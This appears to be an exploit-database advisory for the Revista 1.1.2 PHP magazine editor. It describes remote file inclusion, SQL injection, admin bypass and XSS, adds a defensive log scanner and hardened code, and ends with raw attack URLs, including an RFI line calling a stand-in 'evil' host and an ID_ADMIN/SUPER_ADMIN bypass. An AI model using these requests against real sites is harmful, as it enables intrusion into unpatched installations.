Vendor: Revista
By: Sirdarckcat
CVSS: 7.5 (HIGH)
Vulnerability types: Remote File Inclusion, SQLi, Credentials Bypass, XSS
CWE: 89, 79, 264, 79
Product Name: Revista
Affected Version From: 1.1.2
Affected Version To: 1.1.2
Patch Exists: NO
Related CWE: N/A
CPE: a:php_org_mx:revista
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Revista 1.1.2

Revista is a simple Spanish PHP magazine editor. It suffers from multiple vulnerabilities, including Remote File Inclusion, SQLi, Credentials Bypass, and XSS. Remote File Inclusion can be exploited by supplying a malicious URL in the 'adodb' parameter. SQLi can be exploited by sending malicious SQL through the 'id_temas', 'cadena', 'id_autor', 'email', and 'id_articulo' parameters. Credentials Bypass can be exploited by supplying the 'ID_ADMIN' and 'SUPER_ADMIN' parameters in the request URL. XSS can be exploited by sending malicious markup in the 'cadena' and 'email' parameters.
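The parameter shapes listed above are specific enough to look for in web server logs. The following is an added example, not code from Revista, Exploit-DB or the advisory author: it parses Apache combined-format access-log lines, percent-decodes the query string, and flags requests whose 'adodb', id, 'cadena', 'email', 'ID_ADMIN' or 'SUPER_ADMIN' values match the advisory's vulnerability classes. The log lines are constructed for the example and use documentation IP ranges.

```php
<?php
// Added example (not Revista's or the advisory author's code): flag access-log
// requests that match the parameter patterns described in the advisory.
// SAMPLE_LOG is constructed for this example.

declare(strict_types=1);

const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [14/Apr/2009:10:01:02 +0000] "GET /estilo/default/index.php?adodb=http://203.0.113.9/x HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [14/Apr/2009:10:01:07 +0000] "GET /estilo/default/autor.php?id_autor=-1+OR+1%3D1 HTTP/1.1" 200 311 "-" "Mozilla/5.0"
198.51.100.7 - - [14/Apr/2009:10:02:14 +0000] "GET /admin/index.php?ID_ADMIN=1&SUPER_ADMIN=1 HTTP/1.1" 200 2048 "-" "curl/7.19"
198.51.100.7 - - [14/Apr/2009:10:02:20 +0000] "GET /estilo/default/busqueda.php?cadena=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 700 "-" "curl/7.19"
198.51.100.7 - - [14/Apr/2009:10:02:31 +0000] "GET /estilo/default/lista.php?email=%27+OR+%27%27%3D%27 HTTP/1.1" 200 640 "-" "curl/7.19"
192.0.2.33 - - [14/Apr/2009:10:03:01 +0000] "GET /estilo/default/articulo.php?id_articulo=42 HTTP/1.1" 200 1500 "-" "Mozilla/5.0"
192.0.2.33 - - [14/Apr/2009:10:03:05 +0000] "GET /estilo/default/busqueda.php?cadena=seguridad HTTP/1.1" 200 900 "-" "Mozilla/5.0"
LOG;

// Extract client IP, timestamp, path and decoded query parameters from one
// combined-format line. Returns null for lines that do not parse.
function parseLogLine(string $line): ?array
{
    if (preg_match('~^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+"~', $line, $m) !== 1) {
        return null;
    }
    $path  = (string) (parse_url($m[3], PHP_URL_PATH) ?: '');
    $query = (string) (parse_url($m[3], PHP_URL_QUERY) ?: '');
    parse_str($query, $params); // percent-decodes values, '+' becomes space
    return ['ip' => $m[1], 'time' => $m[2], 'path' => $path, 'params' => $params];
}

// Map one parsed request onto the advisory's vulnerability classes.
function classify(array $req): array
{
    $p    = $req['params'];
    $hits = [];

    // Remote File Inclusion: 'adodb' carrying a remote URL.
    if (isset($p['adodb']) && preg_match('~^(https?|ftp)://~i', (string) $p['adodb']) === 1) {
        $hits[] = 'rfi:adodb';
    }

    // SQLi on numeric ids: anything that is not a plain positive integer.
    foreach (['id_temas', 'id_autor', 'id_articulo'] as $k) {
        if (isset($p[$k]) && preg_match('/^[0-9]+$/', (string) $p[$k]) !== 1) {
            $hits[] = "sqli:$k";
        }
    }

    // XSS and SQLi on the string parameters echoed back by the search pages.
    foreach (['cadena', 'email'] as $k) {
        if (!isset($p[$k])) {
            continue;
        }
        $v = (string) $p[$k];
        if (preg_match('/[<>]|javascript:/i', $v) === 1) {
            $hits[] = "xss:$k";
        }
        if (preg_match('~[\'"]|--|/\*~', $v) === 1) {
            $hits[] = "sqli:$k";
        }
    }

    // Credentials bypass: admin flags supplied as request parameters.
    if (preg_match('~/admin/index\.php$~', $req['path']) === 1
        && (isset($p['ID_ADMIN']) || isset($p['SUPER_ADMIN']))) {
        $hits[] = 'auth-bypass';
    }

    return $hits;
}

// Run every line through the classifier; return only the lines with findings.
function scanLog(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $req = parseLogLine($line);
        if ($req === null) {
            continue;
        }
        $hits = classify($req);
        if ($hits !== []) {
            $findings[] = ['ip' => $req['ip'], 'time' => $req['time'], 'path' => $req['path'], 'hits' => $hits];
        }
    }
    return $findings;
}

foreach (scanLog(SAMPLE_LOG) as $f) {
    printf("%-14s %-28s %-36s %s\n", $f['ip'], $f['time'], $f['path'], implode(',', $f['hits']));
}
```

On the constructed input the two benign requests (a numeric 'id_articulo' and a plain search term) produce no findings; the other five each map to one class. The string rules are deliberately coarse: a legitimate search term containing an apostrophe will be reported as 'sqli:cadena', so treat hits as triage leads and correlate by client IP and time rather than alerting on a single line.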

Mitigation:

Input validation should be used to prevent malicious input from reaching the application: numeric identifiers ('id_temas', 'id_autor', 'id_articulo') should be validated as integers and every database query should use parameterized statements instead of string concatenation; values echoed back into the page ('cadena', 'email') should be HTML-encoded on output; the 'adodb' parameter should not be used to build an include path at all, and remote inclusion should additionally be disabled in the PHP configuration (allow_url_include=Off). Access control should be enforced server-side: administrator status must come from an authenticated session, never from request parameters such as 'ID_ADMIN' and 'SUPER_ADMIN'.
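The following is an added example, not Revista's code, showing the hardened shape of each handler class the advisory names: an allowlisted include path in place of a request-controlled 'adodb' value, validated and bound numeric ids, a bound string search, output encoding for reflected values, and an admin check that reads only the server-side session. Table, column and file names are assumptions, since the real Revista schema is not on the page; the self-check uses an in-memory SQLite database and assumes the pdo_sqlite extension is available.

```php
<?php
// Added example (not Revista's code): hardened counterparts of the vulnerable
// patterns in the advisory. Table/column/file names below are assumptions.

declare(strict_types=1);

// 1. Remote File Inclusion ('adodb'): never build an include path from request
//    data. Map the request value onto an allowlist of local files instead.
const ADODB_PATHS = [
    'default' => __DIR__ . '/lib/adodb/adodb.inc.php', // assumed path
];

function resolveAdodbPath(string $requested): ?string
{
    // 'http://evil/script' or any other unknown key resolves to null: no include.
    return ADODB_PATHS[$requested] ?? null;
}

// 2. SQLi on numeric ids ('id_temas', 'id_autor', 'id_articulo'): check the
//    shape, cast to int, bind it. A value like "-1 OR 1=1" fails the check.
function parseId(string $raw): ?int
{
    return preg_match('/^[0-9]{1,9}$/', $raw) === 1 ? (int) $raw : null;
}

function findArticle(PDO $db, string $rawId): ?array
{
    $id = parseId($rawId);
    if ($id === null) {
        return null;
    }
    $stmt = $db->prepare('SELECT id_articulo, titulo FROM articulos WHERE id_articulo = ?');
    $stmt->execute([$id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3. SQLi on strings ('cadena', 'email'): bind the value so the database sees
//    it as data; a quote inside it can no longer terminate the literal.
function searchArticles(PDO $db, string $cadena): array
{
    $stmt = $db->prepare('SELECT id_articulo, titulo FROM articulos WHERE titulo LIKE ?');
    $stmt->execute(['%' . $cadena . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// 4. Reflected XSS ('cadena', 'email' echoed back): encode at output time for
//    the HTML context the value is rendered in.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// 5. Credentials bypass ('ID_ADMIN', 'SUPER_ADMIN'): authorization state comes
//    only from the session populated at login, never from $_GET or $_REQUEST.
function isSuperAdmin(array $session): bool
{
    return ($session['super_admin'] ?? false) === true;
}

// Self-check against an in-memory SQLite database (pdo_sqlite assumed).
function selfCheck(): array
{
    $db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $db->exec('CREATE TABLE articulos (id_articulo INTEGER PRIMARY KEY, titulo TEXT)');
    $db->exec("INSERT INTO articulos VALUES (1, 'Seguridad en PHP')");

    return [
        'rfi_blocked'     => resolveAdodbPath('http://evil/script') === null,
        'sqli_id_blocked' => findArticle($db, '-1 OR 1=1') === null,
        'id_lookup_works' => findArticle($db, '1')['titulo'] === 'Seguridad en PHP',
        'sqli_str_inert'  => searchArticles($db, "' OR ''='") === [],
        'search_works'    => count(searchArticles($db, 'PHP')) === 1,
        'xss_encoded'     => h('<script>') === '&lt;script&gt;',
        'bypass_denied'   => isSuperAdmin([]) === false,
    ];
}

foreach (selfCheck() as $check => $ok) {
    printf("%-16s %s\n", $check, $ok ? 'ok' : 'FAIL');
}
```

Every entry of the self-check should print 'ok'. The two design choices worth copying are that validation and binding are separate layers (parseId rejects the shape, the prepared statement removes any remaining chance of the value being parsed as SQL) and that the session check compares strictly against a boolean, so a request-derived string can never satisfy it even if the application ran with register_globals enabled.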
Source

Exploit-DB raw data:

Discovered by Sirdarckcat from elhacker.net

------------------------------------------------------------------------------------

Revista 1.1.2

http://php-revista.sourceforge.org

------------------------------------------------------------------------------------

Revista is a simple Spanish PHP magazine editor.

It was done by php.org.mx

It suffers from multiple vulnerabilities.

------------------------------------------------------------------------------------

Remote File Inclusion

http://revista/estilo/[ANY STYLE]/index.php?adodb=http://evil/script

------------------------------------------------------------------------------------

SQLi

http://revista/estilo/[ANY STYLE]/busqueda_tema.php?id_temas=-1+[SQL]

http://revista/estilo/[ANY STYLE]/busqueda.php?cadena='+[SQL]

http://revista/estilo/[ANY STYLE]/autor.php?id_autor=-1+[SQL]

http://revista/estilo/[ANY STYLE]/lista.php?email='+[SQL]

http://revista/estilo/[ANY STYLE]/articulo.php?id_articulo=-1+[SQL]

------------------------------------------------------------------------------------

Credentials Bypass

http://revista/admin/index.php?ID_ADMIN=1&SUPER_ADMIN=1

------------------------------------------------------------------------------------

XSS

http://revista/estilo/[ANY STYLE]/busqueda.php?cadena=<XSS>

http://revista/estilo/[ANY STYLE]/lista.php?email=<XSS>

------------------------------------------------------------------------

# milw0rm.com [2009-04-14]